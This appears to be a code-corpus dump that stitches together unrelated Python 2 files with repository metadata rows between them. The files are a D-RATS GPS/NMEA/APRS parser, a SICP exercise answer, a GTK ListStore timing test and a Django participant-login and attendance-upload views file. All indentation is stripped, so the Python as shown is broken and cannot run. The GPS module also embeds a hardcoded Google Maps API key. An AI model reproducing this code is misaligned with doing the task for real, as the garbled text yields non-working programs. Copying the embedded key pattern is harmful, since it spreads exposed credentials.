#print "cos(lat_a) * sin(lon_a) * cos(lat_b) * sin(lon_b) = %f" % (\
# cos(lat_a) * sin(lon_a) * cos(lat_b) * sin(lon_b))
#print "sin(lat_a) * sin(lat_b) = %f" % (sin(lat_a) * sin(lat_b))
tmp = (cos(lat_a) * cos(lon_a) * \
cos(lat_b) * cos(lon_b)) + \
(cos(lat_a) * sin(lon_a) * \
cos(lat_b) * sin(lon_b)) + \
(sin(lat_a) * sin(lat_b))
# Correct round-off error (which is just *silly*)
if tmp > 1:
tmp = 1
elif tmp < -1:
tmp = -1
distance = acos(tmp)
return distance * earth_radius
def parse_date(string, fmt):
try:
return datetime.datetime.strptime(string, fmt)
except AttributeError, e:
print "Enabling strptime() workaround for Python <= 2.4.x"
vals = {}
for c in "mdyHMS":
i = fmt.index(c)
vals[c] = int(string[i-1:i+1])
if len(vals.keys()) != (len(fmt) / 2):
raise Exception("Not all date bits converted")
return datetime.datetime(vals["y"] + 2000,
vals["m"],
vals["d"],
vals["H"],
vals["M"],
vals["S"])
class GPSPosition(object):
"""Represents a position on the globe, either from GPS data or a static
positition"""
def _from_coords(self, lat, lon, alt=0):
try:
self.latitude = float(lat)
except ValueError:
self.latitude = parse_dms(lat)
try:
self.longitude = float(lon)
except ValueError:
self.longitude = parse_dms(lon)
self.altitude = float(alt)
self.satellites = 3
self.valid = True
def _parse_dprs_comment(self):
symbol = self.comment[0:4].strip()
astidx = self.comment.rindex("*")
checksum = self.comment[astidx:]
_checksum = DPRS_checksum(self.station, self.comment[:astidx])
if int(_checksum[1:], 16) != int(checksum[1:], 16):
print "CHECKSUM(%s): %s != %s" % (self.station,
int(_checksum[1:], 16),
int(checksum[1:], 16))
#print "Failed to parse DPRS comment:"
#print " Comment: |%s|" % self.comment
#print " Check: %s %s (%i)" % (checksum, _checksum, astidx)
raise Exception("DPRS checksum failed")
self.APRSIcon = dprs_to_aprs(symbol)
self.comment = self.comment[4:astidx].strip()
def __init__(self, lat=0, lon=0, station="UNKNOWN"):
self.valid = False
self.altitude = 0
self.satellites = 0
self.station = station
self.comment = ""
self.current = None
self.date = datetime.datetime.now()
self.speed = None
self.direction = None
self.APRSIcon = None
self._original_comment = ""
self._from_coords(lat, lon)
def __iadd__(self, update):
self.station = update.station
if not update.valid:
return self
if update.satellites:
self.satellites = update.satellites
if update.altitude:
self.altitude = update.altitude
self.latitude = update.latitude
self.longitude = update.longitude
self.date = update.date
if update.speed:
self.speed = update.speed
if update.direction:
self.direction = update.direction
if update.comment:
self.comment = update.comment
self._original_comment = update._original_comment
if update.APRSIcon:
self.APRSIcon = update.APRSIcon
return self
def __str__(self):
if self.valid:
if self.current:
dist = self.distance_from(self.current)
bear = self.current.bearing_to(self)
distance = " - %.1f %s " % (dist, EARTH_UNITS) + \
_("away") + \
" @ %.1f " % bear + \
_("degrees")
else:
distance = ""
if self.comment:
comment = " (%s)" % self.comment
else:
comment = ""
if self.speed and self.direction:
if EARTH_UNITS == "mi":
speed = "%.1f mph" % (float(self.speed) * 1.15077945)
elif EARTH_UNITS == "m":
speed = "%.1f km/h" % (float(self.speed) * 1.852)
else:
speed = "%.2f knots" % float(self.speed)
dir = " (" + _("Heading") +" %.0f at %s)" % (self.direction,
speed)
else:
dir = ""
if EARTH_UNITS == "mi":
alt = "%i ft" % meters2feet(self.altitude)
else:
alt = "%i m" % self.altitude
return "%s " % self.station + \
_("reporting") + \
" %.4f,%.4f@%s at %s%s%s%s" % ( \
self.latitude,
self.longitude,
alt,
self.date.strftime("%H:%M:%S"),
subst.subst_string(comment),
distance,
dir)
else:
return "(" + _("Invalid GPS data") + ")"
def _NMEA_format(self, val, latitude):
if latitude:
if val > 0:
d = "N"
else:
d = "S"
else:
if val > 0:
d = "E"
else:
d = "W"
return "%.3f,%s" % (deg2nmea(abs(val)), d)
def station_format(self):
if " " in self.station:
call, extra = self.station.split(" ", 1)
sta = "%-7.7s%1.1s" % (call.strip(),
extra.strip())
else:
sta = self.station
return sta
def to_NMEA_GGA(self, ssid=" "):
"""Returns an NMEA-compliant GPGGA sentence"""
date = time.strftime("%H%M%S")
lat = self._NMEA_format(self.latitude, True)
lon = self._NMEA_format(self.longitude, False)
data = "GPGGA,%s,%s,%s,1,%i,0,%i,M,0,M,," % ( \
date,
lat,
lon,
self.satellites,
self.altitude)
sta = self.station_format()
# If we had an original comment (with some encoding), use that instead
if self._original_comment:
com = self._original_comment
else:
com = self.comment
return "$%s%s\r\n%-8.8s,%-20.20s\r\n" % (data,
NMEA_checksum(data),
sta,
com)
def to_NMEA_RMC(self):
"""Returns an NMEA-compliant GPRMC sentence"""
tstamp = time.strftime("%H%M%S")
dstamp = time.strftime("%d%m%y")
lat = self._NMEA_format(self.latitude, True)
lon = self._NMEA_format(self.longitude, False)
if self.speed:
speed = "%03.1f" % self.speed
else:
speed = "000.0"
if self.direction:
dir = "%03.1f" % self.direction
else:
dir = "000.0"
data = "GPRMC,%s,A,%s,%s,%s,%s,%s,000.0,W" % ( \
tstamp,
lat,
lon,
speed,
dir,
dstamp)
sta = self.station_format()
return "$%s%s\r\n%-8.8s,%-20.20s\r\n" % (data,
NMEA_checksum(data),
sta,
self.comment)
def to_APRS(self, dest="APRATS", symtab="/", symbol=">"):
"""Returns a GPS-A (APRS-compliant) string"""
stamp = time.strftime("%H%M%S", time.gmtime())
if " " in self.station:
sta = self.station.replace(" ", "-")
else:
sta = self.station
s = "%s>%s,DSTAR*:/%sh" % (sta, dest, stamp)
if self.latitude > 0:
ns = "N"
Lm = 1
else:
ns = "S"
Lm = -1
if self.longitude > 0:
ew = "E"
lm = 1
else:
ew = "W"
lm = -1
s += "%07.2f%s%s%08.2f%s%s" % (deg2nmea(self.latitude * Lm), ns,
symtab,
deg2nmea(self.longitude * lm), ew,
symbol)
if self.speed and self.direction:
s += "%03.0f/%03.0f" % (float(self.direction), float(self.speed))
if self.altitude:
s += "/A=%06i" % meters2feet(float(self.altitude))
else:
s += "/"
if self.comment:
l = 43
if self.altitude:
l -= len("/A=xxxxxx")
s += "%s" % self.comment[:l]
s += "\r"
return "$$CRC%04X,%s\n" % (GPSA_checksum(s), s)
def set_station(self, station, comment="D-RATS"):
self.station = station
self.comment = comment
self._original_comment = comment
if len(self.comment) >=7 and "*" in self.comment[-3:-1]:
self._parse_dprs_comment()
def distance_from(self, pos):
return distance(self.latitude, self.longitude,
pos.latitude, pos.longitude)
def bearing_to(self, pos):
lat_me = deg2rad(self.latitude)
lon_me = deg2rad(self.longitude)
lat_u = deg2rad(pos.latitude)
lon_u = deg2rad(pos.longitude)
lat_d = deg2rad(pos.latitude - self.latitude)
lon_d = deg2rad(pos.longitude - self.longitude)
y = sin(lon_d) * cos(lat_u)
x = cos(lat_me) * sin(lat_u) - \
sin(lat_me) * cos(lat_u) * cos(lon_d)
bearing = rad2deg(atan2(y, x))
return (bearing + 360) % 360
def set_relative_to_current(self, current):
self.current = current
def coordinates(self):
return "%.4f,%.4f" % (self.latitude, self.longitude)
def fuzzy_to(self, pos):
dir = self.bearing_to(pos)
dirs = ["N", "NNE", "NE", "ENE", "E",
"ESE", "SE", "SSE", "S",
"SSW", "SW", "WSW", "W",
"WNW", "NW", "NNW"]
delta = 22.5
angle = 0
direction = "?"
for i in dirs:
if dir > angle and dir < (angle + delta):
direction = i
angle += delta
return "%.1f %s %s" % (self.distance_from(pos),
EARTH_UNITS,
direction)
class NMEAGPSPosition(GPSPosition):
"""A GPSPosition initialized from a NMEA sentence"""
def _test_checksum(self, string, csum):
try:
idx = string.index("*")
except:
print "String does not contain '*XY' checksum"
return False
segment = string[1:idx]
csum = csum.upper()
_csum = NMEA_checksum(segment).upper()
if csum != _csum:
print "Failed checksum: %s != %s" % (csum, _csum)
return csum == _csum
def _parse_GPGGA(self, string):
elements = string.split(",", 14)
if len(elements) < 15:
raise Exception("Unable to split GPGGA" % len(elements))
t = time.strftime("%m%d%y") + elements[1]
if "." in t:
t = t.split(".")[0]
self.date = parse_date(t, "%m%d%y%H%M%S")
self.latitude = nmea2deg(float(elements[2]), elements[3])
self.longitude = nmea2deg(float(elements[4]), elements[5])
print "%f,%f" % (self.latitude, self.longitude)
self.satellites = int(elements[7])
self.altitude = float(elements[9])
m = re.match("^([0-9]*)(\*[A-z0-9]{2})\r?\n?(.*)$", elements[14])
if not m:
raise Exception("No checksum (%s)" % elements[14])
csum = m.group(2)
if "," in m.group(3):
sta, com = m.group(3).split(",", 1)
if not sta.strip().startswith("$"):
self.station = utils.filter_to_ascii(sta.strip()[0:8])
self.comment = utils.filter_to_ascii(com.strip()[0:20])
self._original_comment = self.comment
if len(self.comment) >=7 and "*" in self.comment[-3:-1]:
self._parse_dprs_comment()
self.valid = self._test_checksum(string, csum)
def _parse_GPRMC(self, string):
if "\r\n" in string:
nmea, station = string.split("\r\n", 1)
else:
nmea = string
station = ""
elements = nmea.split(",", 12)
if len(elements) < 12:
raise Exception("Unable to split GPRMC (%i)" % len(elements))
t = elements[1]
d = elements[9]
if "." in t:
t = t.split(".", 2)[0]
self.date = parse_date(d+t, "%d%m%y%H%M%S")
self.latitude = nmea2deg(float(elements[3]), elements[4])
self.longitude = nmea2deg(float(elements[5]), elements[6])
self.speed = float(elements[7])
self.direction = float(elements[8])
if "*" in elements[11]:
end = 11 # NMEA <=2.0
elif "*" in elements[12]:
end = 12 # NMEA 2.3
else:
raise Exception("GPRMC has no checksum in 12 or 13")
m = re.match("^.?(\*[A-z0-9]{2})", elements[end])
if not m:
print "Invalid end: %s" % elements[end]
return
csum = m.group(1)
if "," in station:
sta, com = station.split(",", 1)
self.station = utils.filter_to_ascii(sta.strip())
self.comment = utils.filter_to_ascii(com.strip())
self._original_comment = self.comment
if len(self.comment) >= 7 and "*" in self.comment[-3:-1]:
self._parse_dprs_comment()
if elements[2] != "A":
self.valid = False
print "GPRMC marked invalid by GPS (%s)" % elements[2]
else:
print "GPRMC is valid"
self.valid = self._test_checksum(string, csum)
def _from_NMEA_GPGGA(self, string):
string = string.replace('\r', ' ')
string = string.replace('\n', ' ')
try:
self._parse_GPGGA(string)
except Exception, e:
import traceback
import sys
traceback.print_exc(file=sys.stdout)
print "Invalid GPS data: %s" % e
self.valid = False
def _from_NMEA_GPRMC(self, string):
try:
self._parse_GPRMC(string)
except Exception, e:
import traceback
import sys
traceback.print_exc(file=sys.stdout)
print "Invalid GPS data: %s" % e
self.valid = False
def __init__(self, sentence, station=_("UNKNOWN")):
GPSPosition.__init__(self)
if sentence.startswith("$GPGGA"):
self._from_NMEA_GPGGA(sentence)
elif sentence.startswith("$GPRMC"):
self._from_NMEA_GPRMC(sentence)
else:
print "Unsupported GPS sentence type: %s" % sentence
class APRSGPSPosition(GPSPosition):
def _parse_date(self, string):
prefix = string[0]
suffix = string[-1]
digits = string[1:-1]
if suffix == "z":
ds = digits[0:2] + \
time.strftime("%m%y", time.gmtime()) + \
digits[2:] + "00"
elif suffix == "/":
ds = digits[0:2] + time.strftime("%m%y") + digits[2:] + "00"
elif suffix == "h":
ds = time.strftime("%d%m%y", time.gmtime()) + digits
else:
print "Unknown APRS date suffix: `%s'" % suffix
return datetime.datetime.now()
d = parse_date(ds, "%d%m%y%H%M%S")
if suffix in "zh":
delta = datetime.datetime.utcnow() - datetime.datetime.now()
else:
delta = datetime.timedelta(0)
return d - delta
def _parse_GPSA(self, string):
m = re.match("^\$\$CRC([A-Z0-9]{4}),(.*)$", string)
if not m:
return
crc = m.group(1)
_crc = "%04X" % GPSA_checksum(m.group(2))
if crc != _crc:
print "APRS CRC mismatch: %s != %s (%s)" % (crc, _crc, m.group(2))
return
elements = string.split(",")
if not elements[0].startswith("$$CRC"):
print "Missing $$CRC..."
return
self.station, dst = elements[1].split(">")
path, data = elements[2].split(":")
# 1 = Entire stamp or ! or =
# 2 = stamp prefix
# 3 = stamp suffix
# 4 = latitude
# 5 = N/S
# 6 = symbol table
# 7 = longitude
# 8 = E/W
# 9 = symbol
#10 = comment
#11 = altitude string
expr = "^(([@/])[0-9]{6}([/hz])|!|=)" + \
"([0-9]{1,4}\.[0-9]{2})([NS])(.)?" + \
"([0-9]{5}\.[0-9]{2})([EW])(.)" + \
"([^/]*)(/A=[0-9]{6})?"
m = re.search(expr, data)
if not m:
print "Did not match GPS-A: `%s'" % data
return
if m.group(1) in "!=":
self.date = datetime.datetime.now()
elif m.group(2) in "@/":
self.date = self._parse_date(m.group(1))
else:
print "Unknown timestamp prefix: %s" % m.group(1)
self.date = datetime.datetime.now()
self.latitude = nmea2deg(float(m.group(4)), m.group(5))
self.longitude = nmea2deg(float(m.group(7)), m.group(8))
self.comment = m.group(10).strip()
self._original_comment = self.comment
self.APRSIcon = m.group(6) + m.group(9)
if len(m.groups()) == 11 and m.group(11):
_, alt = m.group(11).split("=")
self.altitude = feet2meters(int(alt))
self.valid = True
def _from_APRS(self, string):
self.valid = False
try:
self._parse_GPSA(string)
except Exception, e:
print "Invalid APRS: %s" % e
return False
return self.valid
def __init__(self, message):
GPSPosition.__init__(self)
self._from_APRS(message)
class MapImage(object):
def __init__(self, center):
self.key = "ABQIAAAAWot3KuWpenfCAGfQ65FdzRTaP0xjRaMPpcw6bBbU2QUEXQBgHBR5Rr2HTGXYVWkcBFNkPvxtqV4VLg"
self.center = center
self.markers = [center]
def add_markers(self, markers):
self.markers += markers
def get_image_url(self):
el = [ "key=%s" % self.key,
"center=%s" % self.center.coordinates(),
"size=400x400"]
mstr = "markers="
index = ord("a")
for m in self.markers:
mstr += "%s,blue%s|" % (m.coordinates(), chr(index))
index += 1
el.append(mstr)
return "http://maps.google.com/staticmap?%s" % ("&".join(el))
def station_table(self):
table = ""
index = ord('A')
for m in self.markers:
table += "<tr><td>%s</td><td>%s</td><td>%s</td>\n" % (\
chr(index),
m.station,
m.coordinates())
index += 1
return table
def make_html(self):
return """
<html>
<head>
<title>Known stations</title>
</head>
<body>
<h1> Known Stations </h1>
<img src="%s"/><br/><br/>
<table border="1">
%s
</table>
</body>
</html>
""" % (self.get_image_url(), self.station_table())
def display_in_browser(self):
f = tempfile.NamedTemporaryFile(suffix=".html")
name = f.name
f.close()
f = file(name, "w")
f.write(self.make_html())
f.flush()
f.close()
p = platform.get_platform()
p.open_html_file(f.name)
class GPSSource(object):
def __init__(self, port, rate=4800):
self.port = port
self.enabled = False
self.broken = None
try:
self.serial = serial.Serial(port=port, baudrate=rate, timeout=1)
except Exception, e:
print "Unable to open port `%s': %s" % (port, e)
self.broken = _("Unable to open GPS port")
self.thread = None
self.last_valid = False
self.position = GPSPosition()
def start(self):
if self.broken:
print "Not starting broken GPSSource"
return
self.invalid = 100
self.enabled = True
self.thread = threading.Thread(target=self.gpsthread)
self.thread.setDaemon(True)
self.thread.start()
def stop(self):
if self.thread and self.enabled:
self.enabled = False
self.thread.join()
self.serial.close()
def gpsthread(self):
while self.enabled:
data = self.serial.read(1024)
lines = data.split("\r\n")
for line in lines:
if line.startswith("$GPGGA") or \
line.startswith("$GPRMC"):
position = NMEAGPSPosition(line)
if position.valid and line.startswith("$GPRMC"):
self.invalid = 0
elif self.invalid < 10:
self.invalid += 1
if position.valid and self.position.valid:
self.position += position
print _("ME") + ": %s" % self.position
elif position.valid:
self.position = position
else:
print "Could not parse: %s" % line
def get_position(self):
return self.position
def status_string(self):
if self.broken:
return self.broken
elif self.invalid < 10 and self.position.satellites >= 3:
return _("GPS Locked") + " (%i sats)" % self.position.satellites
else:
return _("GPS Not Locked")
class NetworkGPSSource(GPSSource):
def __init__(self, port):
self.port = port
self.enabled = False
self.thread = None
self.position = GPSPosition()
self.last_valid = False
self.sock = None
self.broken = None
def start(self):
self.enabled = True
self.thread = threading.Thread(target=self.gpsthread)
self.thread.setDaemon(True)
self.thread.start()
def stop(self):
if self.thread and self.enabled:
self.enabled = False
self.thread.join()
def connect(self):
try:
_, host, port = self.port.split(":", 3)
port = int(port)
except ValueError, e:
print "Unable to parse %s (%s)" % (self.port, e)
self.broken = _("Unable to parse address")
return False
print "Connecting to %s:%i" % (host, port)
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((host, port))
self.sock.settimeout(10)
except Exception, e:
print "Unable to connect: %s" % e
self.broken = _("Unable to connect") + ": %s" % e
self.sock = None
return False
self.sock.send("r\n")
return True
def gpsthread(self):
while self.enabled:
if not self.sock:
if not self.connect():
time.sleep(1)
continue
try:
data = self.sock.recv(1024)
except Exception, e:
self.sock.close()
self.sock = None
print _("GPSd Socket closed")
continue
line = data.strip()
if not (line.startswith("$GPGGA") or \
line.startswith("$GPRMC")):
continue
pos = NMEAGPSPosition(line)
self.last_valid = pos.valid
if pos.valid and self.position.valid:
self.position += pos
elif pos.valid:
self.position = pos
else:
print "Could not parse: %s" % line
def get_position(self):
return self.position
def status_string(self):
if self.broken:
return self.broken
elif self.last_valid and self.position.satellites >= 3:
return _("GPSd Locked") + " (%i sats)" % self.position.satellites
else:
return _("GPSd Not Locked")
class StaticGPSSource(GPSSource):
def __init__(self, lat, lon, alt=0):
self.lat = lat
self.lon = lon
self.alt = alt
self.position = GPSPosition(self.lat, self.lon)
self.position.altitude = int(float(alt))
if EARTH_UNITS == "mi":
# This is kinda ugly, but assume we're given altitude in the same
# type of units as we've been asked to display
self.position.altitude = feet2meters(self.position.altitude)
def start(self):
pass
def stop(self):
pass
def get_position(self):
return self.position
def status_string(self):
return _("Static position")
def parse_GPS(string):
fixes = []
while "$" in string:
try:
if "$GPGGA" in string:
fixes.append(NMEAGPSPosition(string[string.index("$GPGGA"):]))
string = string[string.index("$GPGGA")+6:]
elif "$GPRMC" in string:
fixes.append(NMEAGPSPosition(string[string.index("$GPRMC"):]))
string = string[string.index("$GPRMC")+6:]
elif "$$CRC" in string:
return APRSGPSPosition(string[string.index("$$CRC"):])
else:
string = string[string.index("$")+1:]
except Exception, e:
print "Exception during GPS parse: %s" % e
string = string[string.index("$")+1:]
if not fixes:
return None
fix = fixes[0]
fixes = fixes[1:]
for extra in fixes:
print "Appending fix: %s" % extra
fix += extra
return fix
if __name__ == "__main__":
nmea_strings = [
"$GPRMC,010922,A,4603.6695,N,07307.3033,W,0.6,66.8,060508,16.1,W,A*1D\r\nVE2SE 9,MV [email protected]*32",
"$GPGGA,203008.78,4524.9729,N,12246.9580,W,1,03,3.8,00133,M,,,,*39",
"$GPGGA,183324.518,4533.0875,N,12254.5939,W,2,04,3.4,48.6,M,-19.6,M,1.2,0000*74",
"$GPRMC,215348,A,4529.3672,N,12253.2060,W,0.0,353.8,030508,17.5,E,D*3C",
"$GPGGA,075519,4531.254,N,12259.400,W,1,3,0,0.0,M,0,M,,*55\r\nK7HIO ,GPS Info",
"$GPRMC,074919.04,A,4524.9698,N,12246.9520,W,00.0,000.0,260508,19.,E*79",
"$GPRMC,123449.089,A,3405.1123,N,08436.4301,W,000.0,000.0,021208,,,A*71",
"$GPRMC,123449.089,A,3405.1123,N,08436.4301,W,000.0,000.0,021208,,,A*71\r\nKK7DS M,LJ DAN*C",
"$GPRMC,230710,A,2748.1414,N,08238.5556,W,000.0,033.1,111208,004.3,W*77",
]
print "-- NMEA --"
for s in nmea_strings:
p = NMEAGPSPosition(s)
if p.valid:
print "Pass: %s" % str(p)
else:
print "** FAIL: %s" % s
aprs_strings = [
"$$CRCCE3E,AE5PL-T>API282,DSTAR*:!3302.39N/09644.66W>/\r",
"$$CRC1F72,KI4IFW-1>APRATS,DSTAR*:@291930/4531.50N/12254.98W>APRS test beacon /A=000022",
"$$CRC80C3,VA2PBI>APU25N,DSTAR*:=4539.33N/07330.28W-73 de Pierre D-Star Montreal {UIV32N}",
"$$CRCA31F,VA2PBI>API282,DSTAR*:/221812z4526.56N07302.34W/\r",
'$$CRCF471,AB9FT-ML>APRATS,DSTAR*:@214235h0.00S/00000.00W>ON D-RATS at Work\r',
]
print "\n-- GPS-A --"
for s in aprs_strings:
p = APRSGPSPosition(s)
if p.valid:
print "Pass: %s" % str(p)
else:
print "** FAIL: %s" % s
| gpl-3.0 | 4,689,796,423,073,490,000 | 28.063158 | 111 | 0.489165 | false |
aoyono/sicpy | Chapter2/exercises/exercise2_76.py | 1 | 1059 | # -*- coding: utf-8 -*-
"""
https://mitpress.mit.edu/sicp/full-text/book/book-Z-H-16.html#%_thm_2.76
"""
def run_the_magic():
print("""
In case we add new types to a system with generic operations:
1. in explicit design style, we would need to create a new predicate
for each type, a new constructor and modify the generic operators
2. in data-directed design style, we would need to modify an install
procedure
3. in message-passing design style, we would need to modify the
dispatch procedure internal to the data constructor
In case we add new operators:
1. in explicit: modify almost everything
2. in data-directed: modify the install package
3. in message-passing: a new constructor with a dispatch function
Data-directed is better when we must often add types.
Message-passing is better when we must often add operations.
""")
if __name__ == "__main__":
run_the_magic()
| mit | -4,016,245,937,390,531,000 | 35.517241 | 80 | 0.621341 | false |
timlau/yumex | src/poc/test-liststore.py | 1 | 2777 | #!/usr/bin/python -tt
import gtk
import time
import gobject
import base64
class Dummy:
def __init__(self):
self.name = 'package'
self.ver = '1.0'
self.rel = '0.1.fc14'
self.arch = 'x86_64'
self.summary = "This is a packages"
def list_store(model, num=10):
for i in xrange(num):
print model[i][1]
def test_store1():
print "Unsorted ListStore"
start = time.time()
d = Dummy()
store = gtk.ListStore(gobject.TYPE_PYOBJECT, str, str, str, str, str, long)
#store = gtk.ListStore(gobject.TYPE_PYOBJECT, str)
for i in xrange(20000):
store.append([d, "%s" % base64.b64encode(str(i)), "Some text", "Some text", "Some text", "Some text", 1000L])
#store.append([d, d.name])
end = time.time()
print ("test_store1 time : %.2f " % (end - start))
list_store(store)
def test_store2():
print "TreeModelSort (set_sort_column_id(1, gtk.SORT_ASCENDING) before population)"
start = time.time()
d = Dummy()
store = gtk.ListStore(gobject.TYPE_PYOBJECT, str, str, str, str, str, long)
sort_store = gtk.TreeModelSort(store)
sort_store.set_sort_column_id(1, gtk.SORT_ASCENDING)
for i in xrange(20000):
store.append([d, "%s" % base64.b64encode(str(i)), "Some text", "Some text", "Some text", "Some text", 1000L])
end = time.time()
print ("test_store2 time : %.2f " % (end - start))
list_store(sort_store)
def test_store3():
print "TreeModelSort (set_sort_column_id(1, gtk.SORT_ASCENDING) after population)"
start = time.time()
d = Dummy()
store = gtk.ListStore(gobject.TYPE_PYOBJECT, str, str, str, str, str, long)
sort_store = gtk.TreeModelSort(store)
#sort_store.set_default_sort_func(lambda *args: -1)
for i in xrange(20000):
store.append([d, "%s" % base64.b64encode(str(i)), "Some text", "Some text", "Some text", "Some text", 1000L])
sort_store.set_sort_column_id(1, gtk.SORT_ASCENDING)
end = time.time()
print ("test_store3 time : %.2f " % (end - start))
list_store(sort_store)
def test_store4():
start = time.time()
d = Dummy()
store = gtk.ListStore(gobject.TYPE_PYOBJECT, str, str, str, str, str, long)
sort_store = gtk.TreeModelSort(store)
#sort_store.set_default_sort_func(lambda *args: -1)
sort_store.set_sort_column_id(-1, gtk.SORT_ASCENDING)
for i in xrange(20000):
store.append([d, "%s" % base64.b64encode(str(i)), "Some text", "Some text", "Some text", "Some text", 1000L])
sort_store.set_sort_column_id(1, gtk.SORT_ASCENDING)
end = time.time()
print ("test_store4 time : %.2f " % (end - start))
list_store(sort_store)
if __name__ == "__main__":
test_store1()
test_store2()
test_store3()
test_store4()
| gpl-2.0 | -2,058,047,734,032,428,000 | 33.7125 | 117 | 0.616853 | false |
kirti3192/spoken-website | mdldjango/views.py | 1 | 15036 | from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from django.core.context_processors import csrf
from models import MdlUser
from events.models import TrainingAttendance
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from forms import *
from django.contrib import messages
import xml.etree.cElementTree as etree
from xml.etree.ElementTree import ElementTree
# Create your views here.
import hashlib
import csv, os, time
from django.core.exceptions import PermissionDenied
from events.views import *
from events.models import *
from django.conf import settings
from events.forms import OrganiserForm
from django.core.mail import EmailMultiAlternatives
from validate_email import validate_email
from get_or_create_participant import get_or_create_participant, encript_password, check_csvfile
def authenticate(username = None, password = None):
try:
#print " i am in moodle auth"
user = MdlUser.objects.get(username=username)
#print user
pwd = user.password
p = encript_password(password)
pwd_valid = (pwd == p)
#print pwd
#print "------------"
if user and pwd_valid:
return user
except Exception, e:
#print e
#print "except ---"
return None
def mdl_logout(request):
if 'mdluserid' in request.session:
del request.session['mdluserid']
request.session.save()
#print "logout !!"
return HttpResponseRedirect('/participant/login')
def mdl_login(request):
messages = {}
if request.POST:
username = request.POST["username"]
password = request.POST["password"]
if not username or not password:
messages['error'] = "Please enter valide Username and Password!"
#return HttpResponseRedirect('/participant/login')
user = authenticate(username = username, password = password)
if user:
request.session['mdluserid'] = user.id
request.session['mdluseremail'] = user.email
request.session['mdlusername'] = user.username
request.session['mdluserinstitution'] = user.institution
request.session.save()
request.session.modified = True
else:
messages['error'] = "Username or Password Doesn't match!"
if request.session.get('mdluserid'):
#print "Current user is ", request.session.get('mdluserid')
return HttpResponseRedirect('/participant/index')
context = {'message':messages}
context.update(csrf(request))
return render(request, 'mdl/templates/mdluser_login.html', context)
def index(request):
mdluserid = request.session.get('mdluserid')
mdlusername = request.session.get('mdlusername')
if not mdluserid:
return HttpResponseRedirect('/participant/login')
try:
mdluser = MdlUser.objects.get(id=mdluserid)
except:
return HttpResponseRedirect('/participant/login')
if str(mdluser.institution).isdigit():
academic = None
try:
academic = AcademicCenter.objects.get(id = mdluser.institution)
except:
pass
if academic:
category = int(request.GET.get('category', 4))
if not (category > 0 and category < 6):
return HttpResponseRedirect('/participant/index/?category=4')
upcoming_workshop = None
upcoming_test = None
past_workshop = None
past_test = None
ongoing_test = None
if category == 3:
upcoming_workshop = Training.objects.filter((Q(status = 0) | Q(status = 1) | Q(status = 2) | Q(status = 3)), academic_id=mdluser.institution, tdate__gte=datetime.date.today()).order_by('-tdate')
if category == 5:
upcoming_test = Test.objects.filter(status=2, academic_id=mdluser.institution, tdate__gt=datetime.date.today()).order_by('-tdate')
if category == 1:
past_workshop = Training.objects.filter(id__in = TrainingAttendance.objects.filter(mdluser_id = mdluser.id).values_list('training_id'), status = 4).order_by('-tdate')
if category == 2:
past_test = Test.objects.filter(id__in = TestAttendance.objects.filter(mdluser_id = mdluser.id).values_list('test_id'), status = 4).order_by('-tdate')
if category == 4:
ongoing_test = Test.objects.filter(status=3, academic_id=mdluser.institution, tdate = datetime.date.today()).order_by('-tdate')
print past_workshop, "******************8"
context = {
'mdluserid' : mdluserid,
'mdlusername' : mdlusername,
'upcoming_workshop' : upcoming_workshop,
'upcoming_test' : upcoming_test,
'past_workshop' : past_workshop,
'past_test' : past_test,
'ongoing_test' : ongoing_test,
'category' : category,
'ONLINE_TEST_URL' : settings.ONLINE_TEST_URL
}
context.update(csrf(request))
return render(request, 'mdl/templates/mdluser_index.html', context)
form = OrganiserForm()
if request.method == 'POST':
form = OrganiserForm(request.POST)
if form.is_valid():
mdluser.institution = form.cleaned_data['college']
mdluser.save()
return HttpResponseRedirect('/participant/index')
context = {
'form' : form
}
context.update(csrf(request))
return render(request, 'mdl/templates/academic.html', context)
@login_required
def offline_details(request, wid, category):
user = request.user
wid = int(wid)
category = int(category)
#print category
user = request.user
form = OfflineDataForm()
try:
if category == 1:
Training.objects.get(pk=wid, status__lt=4)
elif category == 2:
Training.objects.get(pk=wid, status__lt=4)
else:
raise PermissionDenied('You are not allowed to view this page!')
except Exception, e:
raise PermissionDenied('You are not allowed to view this page!')
if request.method == 'POST':
form = OfflineDataForm(request.POST, request.FILES)
try:
if category == 1:
w = Training.objects.get(id = wid)
elif category == 2:
w = Training.objects.get(id = wid)
else:
raise PermissionDenied('You are not allowed to view this page!')
except:
raise PermissionDenied('You are not allowed to view this page!')
if form.is_valid():
file_path = settings.MEDIA_ROOT + 'training/' + str(wid) + str(time.time())
f = request.FILES['xml_file']
fout = open(file_path, 'wb+')
for chunk in f.chunks():
fout.write(chunk)
fout.close()
error_line_no = ''
csv_file_error = 0
csv_file_error, error_line_no = check_csvfile(user, file_path, w, flag=1)
os.unlink(file_path)
#update participant count
update_participants_count(w)
if error_line_no:
messages.error(request, error_line_no)
#update logs
if category == 1:
message = w.academic.institution_name+" has submited Offline "+w.foss.foss+" workshop attendance dated "+w.tdate.strftime("%Y-%m-%d")
update_events_log(user_id = user.id, role = 2, category = 0, category_id = w.id, academic = w.academic_id, status = 5)
update_events_notification(user_id = user.id, role = 2, category = 0, category_id = w.id, academic = w.academic_id, status = 5, message = message)
if not error_line_no:
messages.success(request, "Thank you for uploading the Attendance. Now make sure that you cross check and verify the details before submiting.")
return HttpResponseRedirect('/software-training/workshop/'+str(wid)+'/attendance/')
else:
message = w.academic.institution_name+" has submited Offline training attendance."
update_events_log(user_id = user.id, role = 2, category = 2, category_id = w.id, academic = w.academic_id, status = 5)
update_events_notification(user_id = user.id, role = 2, category = 2, category_id = w.id, academic = w.academic_id, status = 5, message = message)
if not error_line_no:
messages.success(request, "Thank you for uploading the Attendance. Now make sure that you cross check and verify the details before submiting.")
return HttpResponseRedirect('/software-training/training/'+str(wid)+'/attendance/')
messages.error(request, "Please Upload CSV file !")
context = {
'form': form,
}
messages.info(request, """
Please upload the CSV file which you have generated.
To know more <a href="http://process.spoken-tutorial.org/images/9/96/Upload_Attendance.pdf" target="_blank">Click here</a>.
""")
context.update(csrf(request))
return render(request, 'mdl/templates/offline_details.html', context)
def mdl_register(request):
form = RegisterForm()
if request.method == "POST":
form = RegisterForm(request.POST)
#Email exits
try:
user = MdlUser.objects.filter(email=request.POST['email']).first()
if user:
messages.success(request, "Email : "+request.POST['email']+" already registered on this website. Please click <a href='http://www.spoken-tutorial.org/participant/login/'>here </a>to login")
except Exception, e:
#print e
pass
if form.is_valid():
mdluser = MdlUser()
